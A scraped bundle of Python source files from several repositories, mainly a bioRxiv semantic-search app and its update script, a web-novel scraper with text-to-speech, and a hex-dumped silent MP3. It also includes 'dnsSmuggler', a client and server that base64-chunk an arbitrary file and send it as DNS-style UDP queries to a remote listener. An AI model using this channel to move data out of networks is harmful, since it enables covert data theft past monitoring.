plot_data = {"Date": [], "Title": [], "Score": [], "DOI": [], "category": [], "server": []}
search_df = pd.DataFrame(results[0])
# Find the minimum and maximum original scores
min_score = search_df["score"].min()
max_score = search_df["score"].max()
# Normalize scores. The best score (min_score) becomes 100%, and the worst score (max_score) gets a value above 0%.
search_df["score"] = abs(search_df["score"] - max_score) + min_score
abstracts = []
# Iterate over each row in the search_df DataFrame
for index, entry in search_df.iterrows():
row = df.iloc[int(entry["corpus_id"])]
# Construct the DOI link
try:
doi_link = f"{doi.get_real_url_from_doi(row['doi'])}"
except:
doi_link = f'https://www.doi.org/'+row['doi']
# Append information to plot_data for visualization
plot_data["Date"].append(row["date"])
plot_data["Title"].append(row["title"])
plot_data["Score"].append(search_df["score"][index]) # type: ignore
plot_data["DOI"].append(row["doi"])
plot_data["category"].append(row["category"])
plot_data["server"].append(row["server"])
#summary_text = summarize_abstract(row['abstract'])
with st.expander(f"{index+1}\. {row['title']}"): # type: ignore
col1, col2 = st.columns(2)
col1.markdown(f"**Score:** {entry['score']:.1f}")
col2.markdown(f"**Server:** [{row['server']}]")
st.markdown(f"**Authors:** {row['authors']}")
col1, col2 = st.columns(2)
col2.markdown(f"**Category:** {row['category']}")
col1.markdown(f"**Date:** {row['date']}")
#st.markdown(f"**Summary:**\n{summary_text}", unsafe_allow_html=False)
abstracts.append(row['abstract'])
st.markdown(
f"**Abstract:**\n{row['abstract']}", unsafe_allow_html=False
)
st.markdown(
f"**[Full Text Read]({doi_link})** 🔗", unsafe_allow_html=True
)
plot_df = pd.DataFrame(plot_data)
# Convert 'Date' to datetime if it's not already in that format
plot_df["Date"] = pd.to_datetime(plot_df["Date"])
# Sort the DataFrame based on the Date to make sure it's ordered
plot_df = plot_df.sort_values(by="Date")
if use_ai:
if not use_hf:
ai_gen_start = time.time()
st.markdown('**AI Summary of 10 abstracts:**')
st.markdown(summarize_abstract(abstracts[:9], api_key=str(groq_api_provided)))
total_ai_time = time.time()-ai_gen_start
st.markdown(f'**Time to generate summary:** {total_ai_time:.2f} s')
# Need to figure our how to get it from huggingface
else:
ai_gen_start = time.time()
st.markdown('**AI Summary of 10 abstracts:**')
formatted_text = str(LLM_prompt+"\n".join(f"{idx + 1}. {abstract}" for idx, abstract in enumerate(abstracts[:9])))
prompt = f"Human: \n {formatted_text}\n\n AI:"
LLM_answer = query_hf_api(formatted_text, summarization_API_URL)[0] #['generated_text']
if 'AI:' in LLM_answer:
LLM_answer = LLM_answer.split('AI: ')[1]
st.markdown(LLM_answer)
total_ai_time = time.time()-ai_gen_start
st.markdown(f'**Time to generate summary:** {total_ai_time:.2f} s')
# Create a Plotly figure
fig = px.scatter(
plot_df,
x="Date",
y="Score",
hover_data=["Title", "DOI"],
color='server',
title="Publication Times and Scores",
)
fig.update_traces(marker=dict(size=10))
# Customize hover text to display the title and link it to the DOI
fig.update_traces(
hovertemplate="<b>%{hovertext}</b>",
hovertext=plot_df.apply(lambda row: f"{row['Title']}", axis=1),
)
# Show the figure in the Streamlit app
st.plotly_chart(fig, use_container_width=True)
# Generate category counts for the pie chart
category_counts = plot_df["category"].value_counts().reset_index()
category_counts.columns = ["category", "count"]
# Create a pie chart with Plotly Express
fig = px.pie(
category_counts,
values="count",
names="category",
title="Category Distribution",
)
# Show the pie chart in the Streamlit app
st.plotly_chart(fig, use_container_width=True)
st.markdown(
"""
<div style='text-align: center;'>
<b>Developed by <a href="https://www.dzyla.com/" target="_blank">Dawid Zyla</a></b>
<br>
<a href="https://github.com/dzyla/biorxiv_search" target="_blank">Source code on GitHub</a>
</div>
""",
unsafe_allow_html=True,
)
| 24,189 | Python | .py | 516 | 36.325581 | 300 | 0.616448 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,186 | update_database.py | dzyla_biorxiv_search/update_database.py | import pandas as pd
import numpy as np
from pathlib import Path
import datetime
import requests
import json
import os
from datetime import datetime
from dateutil.relativedelta import relativedelta
from concurrent.futures import ThreadPoolExecutor, as_completed
import pandas as pd
import os
import json
from pathlib import Path
from sentence_transformers import SentenceTransformer, models
import torch
import shutil
import dropbox
import streamlit as st
def load_data_embeddings():
existing_data_path = "aggregated_data"
new_data_directory = "db_update"
existing_embeddings_path = "biorxiv_ubin_embaddings.npy"
updated_embeddings_directory = "embed_update"
# Load existing database and embeddings
df_existing = pd.read_parquet(existing_data_path)
embeddings_existing = np.load(existing_embeddings_path, allow_pickle=True)
# Prepare lists to collect new updates
df_updates_list = []
embeddings_updates_list = []
# Ensure pairing of new data and embeddings by their matching filenames
new_data_files = sorted(Path(new_data_directory).glob("*.parquet"))
for data_file in new_data_files:
# Assuming naming convention allows direct correlation
corresponding_embedding_file = Path(updated_embeddings_directory) / (
data_file.stem + ".npy"
)
if corresponding_embedding_file.exists():
# Load and append DataFrame and embeddings
df_updates_list.append(pd.read_parquet(data_file))
embeddings_updates_list.append(np.load(corresponding_embedding_file))
else:
print(f"No corresponding embedding file found for {data_file.name}")
# Concatenate all updates
if df_updates_list:
df_updates = pd.concat(df_updates_list)
else:
df_updates = pd.DataFrame()
if embeddings_updates_list:
embeddings_updates = np.vstack(embeddings_updates_list)
else:
embeddings_updates = np.array([])
# Append new data to existing, handling duplicates as needed
df_combined = pd.concat([df_existing, df_updates])
# create a mask for filtering
mask = ~df_combined.duplicated(subset=["title"], keep="last")
df_combined = df_combined[mask]
# Combine embeddings, ensuring alignment with the DataFrame
embeddings_combined = (
np.vstack([embeddings_existing, embeddings_updates])
if embeddings_updates.size
else embeddings_existing
)
# filter the embeddings based on dataframe unique entries
embeddings_combined = embeddings_combined[mask]
return df_combined, embeddings_combined
# Fast fetch data from bioRxiv
def fetch_and_save_data_block(endpoint, server, block_start, block_end, save_directory, format='json'):
base_url = f"https://api.biorxiv.org/{endpoint}/{server}/"
block_interval = f"{block_start.strftime('%Y-%m-%d')}/{block_end.strftime('%Y-%m-%d')}"
block_data = []
cursor = 0
continue_fetching = True
while continue_fetching:
url = f"{base_url}{block_interval}/{cursor}/{format}"
response = requests.get(url)
if response.status_code != 200:
print(f"Failed to fetch data for block {block_interval} at cursor {cursor}. HTTP Status: {response.status_code}")
break
data = response.json()
fetched_papers = len(data['collection'])
if fetched_papers > 0:
block_data.extend(data['collection'])
cursor += fetched_papers # Update the cursor to fetch next set of data
print(f"Fetched {fetched_papers} papers for block {block_interval}. Total fetched: {cursor}.")
else:
continue_fetching = False
if block_data:
save_data_block(block_data, block_start, block_end, endpoint, save_directory)
def save_data_block(block_data, start_date, end_date, endpoint, save_directory):
start_yymmdd = start_date.strftime("%y%m%d")
end_yymmdd = end_date.strftime("%y%m%d")
filename = f"{save_directory}/{endpoint}_data_{start_yymmdd}_{end_yymmdd}.json"
with open(filename, 'w') as file:
json.dump(block_data, file, indent=4)
print(f"Saved data block to {filename}")
def fetch_data(endpoint, server, interval, save_directory, format='json'):
os.makedirs(save_directory, exist_ok=True)
start_date, end_date = [datetime.strptime(date, "%Y-%m-%d") for date in interval.split('/')]
current_date = start_date
tasks = []
with ThreadPoolExecutor(max_workers=12) as executor: # Adjust the number of workers as needed
while current_date <= end_date:
block_start = current_date
block_end = min(current_date + relativedelta(months=1) - relativedelta(days=1), end_date)
tasks.append(executor.submit(fetch_and_save_data_block, endpoint, server, block_start, block_end, save_directory, format))
current_date += relativedelta(months=1)
for future in as_completed(tasks):
future.result()
def load_json_to_dataframe(json_file):
"""Load JSON data from a file into a pandas DataFrame."""
with open(json_file, 'r') as file:
data = json.load(file)
return pd.DataFrame(data)
def save_dataframe(df, save_path):
"""Save DataFrame to a file in Parquet format."""
df.to_parquet(save_path)
def process_json_files(directory, save_directory):
"""Process each JSON file in a directory and save its data to a Parquet file with a corresponding name."""
# Ensure the save directory exists
os.makedirs(save_directory, exist_ok=True)
json_files = list(Path(directory).glob('*.json'))
print(f'json_files {type(json_files)}: {json_files}')
for json_file in json_files:
df = load_json_to_dataframe(json_file)
# Optionally perform any data cleaning or preprocessing here
# Derive Parquet filename from JSON filename
parquet_filename = f"{json_file.stem}.parquet"
save_path = os.path.join(save_directory, parquet_filename)
# If the embedding for this file already exists, remove it
if os.path.exists(save_path):
npy_file_path = save_path.replace('db_update', 'embed_update').replace('parquet', 'npy')
if os.path.exists(npy_file_path):
os.remove(npy_file_path)
print(f'Removed embedding file {npy_file_path} due to the dataframe update')
# Save the DataFrame to Parquet format
save_dataframe(df, save_path)
print(f"Processed and saved {json_file.name} to {parquet_filename}")
def load_unprocessed_parquets(db_update_directory, embed_update_directory):
"""
Load Parquet files from db_update_directory that do not have a corresponding
.npy file in embed_update_directory.
Parameters:
- db_update_directory: Path to the directory containing the Parquet files.
- embed_update_directory: Path to the directory containing the .npy files.
Returns:
- A list of pandas DataFrames loaded from unprocessed Parquet files.
"""
# Convert string paths to Path objects for easier manipulation
db_update_directory = Path(db_update_directory)
embed_update_directory = Path(embed_update_directory)
# List all Parquet files in db_update_directory
parquet_files = list(db_update_directory.glob('*.parquet'))
# List all .npy files in embed_update_directory and strip extensions for comparison
npy_files = {f.stem for f in embed_update_directory.glob('*.npy')}
# Initialize an empty list to store loaded DataFrames from unprocessed Parquet files
unprocessed_dataframes = []
# Loop through Parquet files and load those without a corresponding .npy file
for parquet_file in parquet_files:
if parquet_file.stem not in npy_files:
# Load the Parquet file as a pandas DataFrame and add it to the list
#df = pd.read_parquet(parquet_file)
unprocessed_dataframes.append(parquet_file)
print(f"Loaded unprocessed Parquet file: {parquet_file.name}")
else:
print(f"Skipping processed Parquet file: {parquet_file.name}")
return unprocessed_dataframes
def connect_to_dropbox():
dropbox_APP_KEY = st.secrets["dropbox_APP_KEY"]
dropbox_APP_SECRET = st.secrets["dropbox_APP_SECRET"]
dropbox_REFRESH_TOKEN = st.secrets["dropbox_REFRESH_TOKEN"]
dbx = dbx = dropbox.Dropbox(
app_key = dropbox_APP_KEY,
app_secret = dropbox_APP_SECRET,
oauth2_refresh_token = dropbox_REFRESH_TOKEN
)
return dbx
def upload_path(local_path, dropbox_path):
dbx = connect_to_dropbox()
local_path = Path(local_path)
if local_path.is_file():
relative_path = local_path.name
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_path, dropbox_file_path, dbx)
elif local_path.is_dir():
for local_file in local_path.rglob('*'):
if local_file.is_file():
relative_path = local_file.relative_to(local_path.parent)
dropbox_file_path = os.path.join(dropbox_path, relative_path).replace('\\', '/').replace('//', '/')
upload_file(local_file, dropbox_file_path, dbx)
else:
print("The provided path does not exist.")
def upload_file(file_path, dropbox_file_path, dbx):
try:
# Normalize the path for Dropbox API
dropbox_file_path = dropbox_file_path.replace('\\', '/')
# Check if the file exists on Dropbox and get metadata
try:
metadata = dbx.files_get_metadata(dropbox_file_path)
dropbox_mod_time = metadata.server_modified
local_mod_time = datetime.fromtimestamp(file_path.stat().st_mtime)
# Skip upload if the Dropbox file is newer or the same age
if dropbox_mod_time >= local_mod_time:
print(f"Skipped {dropbox_file_path}, Dropbox version is up-to-date.")
return
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.GetMetadataError) or e.error.is_path() and e.error.get_path().is_not_found():
print(f"No existing file on Dropbox, proceeding with upload: {dropbox_file_path}")
else:
raise e
# Proceed with uploading if file does not exist or is outdated
with file_path.open('rb') as f:
dbx.files_upload(f.read(), dropbox_file_path, mode=dropbox.files.WriteMode.overwrite)
print(f"Uploaded {dropbox_file_path}")
except Exception as e:
print(f"Failed to upload {dropbox_file_path}: {str(e)}")
endpoint = "details"
server = "biorxiv"
df, embeddings = load_data_embeddings()
start_date = df['date'].max()
last_date = datetime.today().strftime('%Y-%m-%d')
interval = f'{start_date}/{last_date}'
print(f'using interval: {interval}')
save_directory = "db_update_json"
fetch_data(endpoint, server, interval, save_directory)
directory = r'db_update_json' # Directory containing JSON files
save_directory = r'db_update' # Directory to save aggregated data
process_json_files(directory, save_directory)
db_update_directory = 'db_update'
embed_update_directory = 'embed_update'
unprocessed_dataframes = load_unprocessed_parquets(db_update_directory, embed_update_directory)
if unprocessed_dataframes:
for file in unprocessed_dataframes:
df = pd.read_parquet(file)
query = df['abstract'].tolist()
device = "cuda" if torch.cuda.is_available() else "cpu"
model = SentenceTransformer("mixedbread-ai/mxbai-embed-large-v1")
model.to(device)
query_embedding = model.encode(query, normalize_embeddings=True, precision='ubinary', show_progress_bar=True)
file_path=os.path.basename(file).split('.')[0]
embeddings_path = f'embed_update/{file_path}'
np.save(embeddings_path, query_embedding)
print(f'Saved embeddings {embeddings_path}')
# remove old json directory
db_update_json = 'db_update_json'
shutil.rmtree(db_update_json)
print(f"Directory '{db_update_json}' and its contents have been removed.")
for path in ['db_update', 'embed_update']:
upload_path(path, '//')
else:
print('Nothing to do')
| 12,711 | Python | .py | 251 | 42 | 135 | 0.671076 | dzyla/biorxiv_search | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,187 | client.py | 0x7sec_dnsSmuggler/client.py | import sys
import socket
import base64
import time
# Constants
PAYLOAD_SIZE = 32 # Maximum payload size for DNS query
DOMAIN_SUFFIX = ".example.com" # Suffix for the domain name
def read_file(filename):
try:
with open(filename, 'rb') as file:
content = file.read()
return content
except FileNotFoundError:
print("Error: File not found.")
sys.exit(1)
def create_dns_query(data, index):
data_chunk = data[index : index + PAYLOAD_SIZE]
data_b64 = base64.b64encode(data_chunk).decode()
query = f"{data_b64}.{index}{DOMAIN_SUFFIX}"
return query
def send_dns_query(query, server_ip):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(query.encode(), (server_ip, 53))
sock.close()
def main():
if len(sys.argv) != 3:
print("Usage: python client.py <file_name> <server_ip>")
sys.exit(1)
filename = sys.argv[1]
server_ip = sys.argv[2]
# Read file content
file_content = read_file(filename)
total_size = len(file_content)
print(f"Total number of packets to send: {total_size // PAYLOAD_SIZE + 1}")
# Send data in chunks
index = 0
while index < total_size:
query = create_dns_query(file_content, index)
print(f"Sending packet {index // PAYLOAD_SIZE + 1} out of {total_size // PAYLOAD_SIZE + 1}")
print("Data sent:", query)
send_dns_query(query, server_ip)
index += PAYLOAD_SIZE
time.sleep(1)
print("File sent successfully.")
if __name__ == "__main__":
main()
| 1,574 | Python | .py | 46 | 28.717391 | 100 | 0.644693 | 0x7sec/dnsSmuggler | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,188 | server.py | 0x7sec_dnsSmuggler/server.py | import socket
import base64
import random
import string
# Constants
MAX_CHUNK_SIZE = 32 # Maximum chunk size
DOMAIN_SUFFIX = ".example.com" # Suffix for the domain name
def process_dns_query(query_data):
parts = query_data.split(b'.')
data_b64 = parts[0]
index = int(parts[1])
data_chunk = base64.b64decode(data_b64)
return index, data_chunk
def save_to_file(data_chunks):
random_string = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
filename = f"received_{random_string}.txt"
with open(filename, 'ab') as file:
for index, data_chunk in sorted(data_chunks.items()):
file.write(data_chunk)
def main():
server_ip = '0.0.0.0' # Listen on all interfaces
server_port = 53
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((server_ip, server_port))
print("Server listening...")
data_chunks = {}
expected_index = 0
total_packets = 0
while True:
data, addr = sock.recvfrom(1024)
total_packets += 1
index, data_chunk = process_dns_query(data)
print(f"Received packet {index + 1}")
print("Data received:", data_chunk.decode()) # Print the received data chunk
if index == expected_index:
data_chunks[index] = data_chunk
expected_index += len(data_chunk)
else:
print(f"Missing chunk: {expected_index}")
continue
# Check if there are any missing chunks
while expected_index in data_chunks:
expected_index += len(data_chunks[expected_index])
if len(data_chunk) < MAX_CHUNK_SIZE:
break
save_to_file(data_chunks)
print("File received and saved.")
print(f"Total number of packets received: {total_packets}")
sock.close()
if __name__ == "__main__":
main()
| 1,855 | Python | .py | 51 | 30 | 87 | 0.643575 | 0x7sec/dnsSmuggler | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,189 | libread-tool.py | Spectre-hidN_LibRead-Tool/src/libread-tool.py | import sys
import os
import shutil
import time
import asyncio
import configparser
from pynput import keyboard
from pywinctl import getActiveWindow
from utils.scrapper import checkConnection, search, getMetadata, getArticle
from utils.Prettify import clearScreen, Prettify, clearLine
from utils.tts import createTTSFromFile, createTTSFromText
from utils.configGenerator import create_default_config
from utils.ffmpegWrapper import performSanityCheck, mergeChunks
CONFIG_FILE = "libread-config.ini"
# Global varialbes. Values taken from the config file
DOMAIN_NAME = COVER_IMAGE_NAME = OUTPUT_FILE_NAME = REPLACEMENT_CHARACTER = ""
FORCE_USE_M1 = False
PART_REPLACEMENT = True
# global function declaration for simplicity
printInf = Prettify.printInf
printWar = Prettify.printWar
printErr = Prettify.printErr
printSuc = Prettify.printSuc
printFeaturedText = Prettify.printFeaturedText
progressBar = Prettify().progressBar
def _readConfig():
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global DOMAIN_NAME, COVER_IMAGE_NAME, OUTPUT_FILE_NAME, REPLACEMENT_CHARACTER, FORCE_USE_M1, PART_REPLACEMENT
DOMAIN_NAME = config.get("DOMAIN", "domainName")
COVER_IMAGE_NAME = config.get("NOMENCLATURES", "coverImageNomenclature")
OUTPUT_FILE_NAME = config.get("NOMENCLATURES", "outputNomenclature")
REPLACEMENT_CHARACTER = config.get("NOMENCLATURES", "whitespaceReplacementCharacter")
FORCE_USE_M1 = config.getboolean("TTS_CONFIG", "forceGrabFirstThenConvert")
PART_REPLACEMENT = config.getboolean("TTS_CONFIG", "replacePartContents")
except:
printWar("Corrupted config file detected! Re-generating a new one...")
time.sleep(2)
create_default_config(CONFIG_FILE)
_readConfig()
else:
create_default_config(CONFIG_FILE)
_readConfig()
if __name__ == "__main__":
if os.name == 'nt':
os.system("title LibRead-Tool")
else:
os.system('echo -en "\033]0;LibRead-Tool\a"')
clearScreen()
if os.name == 'nt':
os.system("echo \033[38;5;12m\033[0m\r")
print("""\033[38;5;78m _ _ _ ______ _ _______ _ \033[0m
\033[38;5;78m(_) (_)| | (_____ \ | | (_______) | | \033[0m
\033[38;5;78m _ _ | |__ _____) ) _____ _____ __| | _____ _ ___ ___ | | \033[0m
\033[38;5;78m| | | || _ \ | __ / | ___ |(____ | / _ |(_____)| | / _ \ / _ \ | | \033[0m
| |_____ | || |_) )| | \ \ | ____|/ ___ |( (_| | | || |_| || |_| || |
|_______)|_||____/ |_| |_||_____)\_____| \____| |_| \___/ \___/ \_)
""")
_readConfig()
if(not PART_REPLACEMENT):
printFeaturedText("Content replacement is disabled! The LibRead Tool will not overwrite the existing parts before converting.")
print("Checking connection with libread...")
time.sleep(2)
if(checkConnection()):
printSuc("Connection established with libread successfully!")
else:
printErr("Error occured while connecting to libread! Check your Internet connection or firewall settings.")
sys.exit(100)
canUseM2ForTTS = False
if performSanityCheck():
canUseM2ForTTS = True
if(FORCE_USE_M1 or not PART_REPLACEMENT):
canUseM2ForTTS = False
print("\n")
query = input("Type to search something: ")
results = search(query=query)
selectedIndex = -1
if(len(results) == 0):
printWar(f"No results found for the query '{query}'. Try any other keywords!")
input()
sys.exit(404)
elif(len(results) == 1):
printSuc(f"1 hit found for the query '{query}'. Automatically selecting it...")
selectedIndex = 1
else:
printSuc(f"Multiple hits found for the query '{query}'. Select the desired index...")
i = 0
print("\n\033[38;5;162mIndex\033[0m ---- \033[38;5;183mTitle\033[0m")
for tag in results:
print(f"\033[38;5;162m{i+1}\033[0m ---- \033[38;5;183m{tag['title']}\033[0m") if i < 9 else print(f"\033[38;5;162m{i+1}\033[0m ---- \033[38;5;183m{tag['title']}\033[0m")
i+=1
try:
selectedIndex = int(input("Type the desired index from the above list: "))
except:
printErr("Invalid integer value! Aborting...")
sys.exit(200)
if(selectedIndex > len(results) or selectedIndex < 0):
printWar("Index doesn't exists! Automatically selecting the last index...")
selectedIndex = len(results) - 1
selectedIndex-=1
novelLink = f"https://{DOMAIN_NAME}" + results[selectedIndex]['href']
print(f"\nSelected: {results[selectedIndex]['title']} || URL: {novelLink}")
printInf(f"Getting metadata about {results[selectedIndex]['title']} from libread...")
time.sleep(3)
metadataResult = getMetadata(novelLink)
totalChapters = len(metadataResult['chapters'])
print(f"Total chapters found: \033[38;5;63m{len(metadataResult['chapters'])}\033[0m")
print(f"Status: \033[38;5;51m{metadataResult['status']}\033[0m")
print()
startChapter = 1
endChapter = totalChapters
jump = 10
try:
startChapter = int(input("Mention the starting chapter [default = 1]: "))
if(startChapter > startChapter):
printWar("Starting chapter number exceeded total chapter found!")
printInf("Setting starting chapter to 1...")
else:
printInf(f"Setting starting chapter to {startChapter}...")
except:
printWar("Invalid input detected!")
printInf("Setting starting chapter to 1...")
try:
endChapter = int(input(f"Mention the last chapter [default = {totalChapters}]: "))
if(endChapter < 1):
printWar("Ending chapter number less than the first chapter!")
printInf(f"Setting Ending chapter to {totalChapters}...")
else:
printInf(f"Setting Ending chapter to {endChapter}...")
except:
printWar("Invalid input detected!")
printInf(f"Setting Ending chapter to {totalChapters}...")
try:
jump = int(input("Mention number of chapters in each part [default = 10]: "))
if(jump > 30):
printWar("Too many chapters detected in single part! Expect abnormal behaviour.")
except:
pass
isPause = False
pauseInput = input("Do you want to pause after each part? (y/n): ")
isPause = True if pauseInput == "y" else False
if(isPause):
printInf("Process will pause after each part! Press 'R' to resume.")
isTTS = False
ttsInput = input("Do you want to convert text to speech? (y/n): ")
isTTS = True if ttsInput == "y" else False
if(isTTS):
printInf("Texts will be converted to speech.")
#Create a directory for saving the files
if(not os.path.isdir(results[selectedIndex]['title']) and not os.path.isdir("Articles")):
try:
os.mkdir(results[selectedIndex]['title'])
except:
os.mkdir("Articles")
#save cover image
imageName = COVER_IMAGE_NAME.replace("!TITLE!", results[selectedIndex]['title']) + '.jpg'
if(REPLACEMENT_CHARACTER != ""):
imageName = imageName.replace(" ", REPLACEMENT_CHARACTER)
if(metadataResult["cover-image"]!=None):
printInf("\nSaving cover image...")
try:
with open(f"{results[selectedIndex]['title']}/{imageName}", 'wb') as bf:
for chunk in metadataResult['cover-image']:
bf.write(chunk)
bf.close()
except:
with open(f"Articles/{imageName}", 'wb') as bf:
for chunk in metadataResult['cover-image']:
bf.write(chunk)
bf.close()
time.sleep(1)
printSuc(f"Cover image saved as {results[selectedIndex]['title']}/{imageName}")
part = 1
progress = 0
printInf("Getting articles from libread...")
for i in range(startChapter-2, endChapter, jump):
mergedArticle = ""
for j in range(i+1, i+jump+1):
if(j>endChapter-1):
break
articleLink = f"https://{DOMAIN_NAME}" + metadataResult['chapters'][j]['href']
article = getArticle(articleLink)
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There")
# use M2 for TTS
if(isTTS and canUseM2ForTTS):
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;141m[CONVERTING]\033[0m {Chapter - {0}}".replace("{0}", str(j+1)))
# Create the enviroment for the current cycle
wd = results[selectedIndex]['title'] + "/.OPD"
if not os.path.isdir(wd): os.mkdir(wd)
try:
asyncio.run(createTTSFromText(text=article, outputPath=(wd+f"/Chapter-{str(j+1)}.mp3"), coverImagePath=f"{results[selectedIndex]['title']}/{imageName}"))
except Exception as E:
printErr(f"Fatal Exception occured during conversion. Couldn't proceed further with TTS. {E}")
isTTs = False
mergedArticle += article + "\n\n"
progress += 1
endChapterName = i+jump+1
if(i+jump+1 > endChapter):
endChapterName = endChapter
#results[selectedIndex]['title']} ~ Chapter-{i+2}-{endChapterName}
actualOutputFileName = OUTPUT_FILE_NAME.replace("!TITLE!", results[selectedIndex]['title']).replace("!STARTCHAPTER!", str((i+2))).replace("!ENDCHAPTER!", str(endChapterName))
if(REPLACEMENT_CHARACTER != ""):
actualOutputFileName = actualOutputFileName.replace(" ", REPLACEMENT_CHARACTER)
if(i+1 < endChapter):
try:
if (not PART_REPLACEMENT and os.path.isfile(f"{results[selectedIndex]['title']}/{actualOutputFileName}.txt")):
pass
else:
with open(f"{results[selectedIndex]['title']}/{actualOutputFileName}.txt", "w", encoding='utf-8') as f:
f.write(mergedArticle)
f.close()
except:
if(not PART_REPLACEMENT and os.path.isfile(f"Articles/{actualOutputFileName}.txt")):
pass
else:
with open(f"Articles/{actualOutputFileName}.txt", "w", encoding='utf-8') as f:
f.write(mergedArticle)
f.close()
# merge converted chunks and delete the opd folder
if(isTTS and canUseM2ForTTS):
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;87m[CONCATENATING]\033[0m ")
mergeChunks(chunkFilesDir=results[selectedIndex]['title'] + "/.OPD",
outputFilePrefix=f"{results[selectedIndex]['title']}/{actualOutputFileName}",
coverImagePath=f"{results[selectedIndex]['title']}/{imageName}")
shutil.rmtree(results[selectedIndex]['title'] + "/.OPD")
if(isTTS and not canUseM2ForTTS):
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;141m[CONVERTING]\033[0m {Chapter: {startChapter}-{EndChapter}}".replace("{startChapter}", str(i+2)).replace("{EndChapter}", str(endChapterName)))
try:
asyncio.run(createTTSFromFile(filepath=f"{results[selectedIndex]['title']}/{actualOutputFileName}.txt", outputFilePrefix=f"{results[selectedIndex]['title']}/{actualOutputFileName}", coverImagePath=f"{results[selectedIndex]['title']}/{imageName}"))
except:
try:
asyncio.run(createTTSFromFile(filepath=f"Articles/{actualOutputFileName}.txt", outputFilePrefix=f"Articles/{actualOutputFileName}", coverImagePath=f"Articles/{imageName}"))
except Exception as E:
printErr("\nFatal error Occured while converting text to speech! Couldn't proceed further with TTS. {E}")
# breaks on Windows and wayland
if(isPause and progress != ((endChapter-startChapter))+1):
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There \033[38;5;226m[PAUSED]\033[0m ")
def pause_process():
with keyboard.Events() as events:
event = events.get(1e6)
if("libread-tool" in (" " + getActiveWindow().title.lower() + " ") or "visual studio code" in getActiveWindow().title.lower()):
if(event.key == keyboard.KeyCode.from_char('r')):
return
else:
event = None
pause_process()
else:
event = None
pause_process()
pause_process()
clearLine()
progressBar(total_size=endChapter-startChapter, size_done=progress, fill_symbol="■", length=35, suffix="There ")
clearLine()
print()
printFeaturedText("Fetched all chapters successfully!", msgColorCode=105, blinkersColorCode=46)
print(f"All chapters are stored inside the {results[selectedIndex]['title']} directory.")
input()
| 14,008 | Python | .py | 263 | 42.178707 | 281 | 0.600295 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,190 | twoSecondSilence.py | Spectre-hidN_LibRead-Tool/src/utils/twoSecondSilence.py | import binascii
"""
Get the raw bytes for the file https://github.com/anars/blank-audio/blob/master/2-seconds-of-silence.mp3
NOTE -> This is a ridiculous way to extract data. But, I didn't want to include the file as a resource
"""
def getFileBytes():
xxdDump = """49443304000000021805544954320000001500000032205365636f6e6473
206f662053696c656e63655450453100000012000000416e617220536f66
7477617265204c4c4354414c420000000c000000426c616e6b2041756469
6f4150494300020f02000000696d6167652f6a70656700030089504e470d
0a1a0a0000000d4948445200000438000004380806000000ec106c8f0000
0006624b474400ff00ff00ffa0bda79300000009704859730000083d0000
083d01059555b60000000774494d4507df0a0b051c31036f047600002000
4944415478daecdd7b945565dd07f0df300c3701012f28ea8089572c53b0
34b1a2326f81562ade354d5108336995a6a6a879ebe22d35afa4af809acb
d4340d0d4359bd967929bca46472d11004811161b88cf3fed15b0b9c9973
ce9e3967e63c339fcf5aef7a6bef673f7befdfb3cf70ceb767ef5d1111f5
0100000090b04e4a00000000a44ec001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
244fc001000000244fc001000000244fc001000000244fc001000000244f
c001000000244fc001000000244fc001000000244fc001000000244fc001
000000244fc001000000244fc001000000244fc001000000244fc0010000
00244fc001000000244fc001000000244fc001000000244fc00100000024
4fc001000000244fc001000000244fc001000000244fc001000000244fc0
01000000244fc001000000244fc001000000244fc001000000244fc00100
0000244fc001000000244fc001000000244fc001000000244fc001000000
